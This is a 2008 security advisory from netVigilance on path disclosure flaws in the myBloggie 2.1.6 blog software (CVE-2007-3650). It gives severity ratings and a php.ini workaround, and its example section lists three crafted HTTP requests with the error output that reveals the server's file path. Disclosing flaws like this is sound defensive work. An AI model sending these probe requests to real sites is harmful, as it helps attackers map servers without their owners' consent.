netVigilance Logo left1 netVigilance Logo left2 netVigilance Logo text1 netVigilance Logo text2 netVigilance Logo Right
Security Advisories

netVigilance Security Advisory 39

myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities


Description:
myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers.

Security problems in the product allow attackers to gather the true path of the server-side script.

External References:
Mitre CVE: CVE-2007-3650
NVD NIST: CVE-2007-3650


Summary:
myBloggie is weblog system built using PHP & mySQL, web's most popular scripting language & database system which enable myBloggie to be installed in any web server.

Release Date:
June 30 2008

Severity:
Risk: Medium

Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS Base Score: 5.0

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated


SecureScout Testcase ID:
TC 17970

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.

Vendor:
myWebland

Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.

Workaround:
Disable warning messages: modify in the php.ini file following line:
display_errors = Off.

Example:

Path Disclosure Vulnerability 1:

REQUEST:

(PHP <5.0.0 and Windows Hosting are required)

http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000
REPLY:
...
Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28

...
Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44

...

Path Disclosure Vulnerability 2:

REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/common.php
REPLY:
...
Warning: preg_replace(): Empty regular expression in [DISCLOSED PATH][PRODUCT DIRECTORY]\common.php on line 79

...

Path Disclosure Vulnerability 3:

REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login
REPLY:
...
Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH][PRODUCT DIRECTORY]\login.php on line 39

...



Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com

back to Security Advisories
 

 

   Copyright©2004-2009,  netVigilance, Inc.   All rights reserved  •  Privacy Policy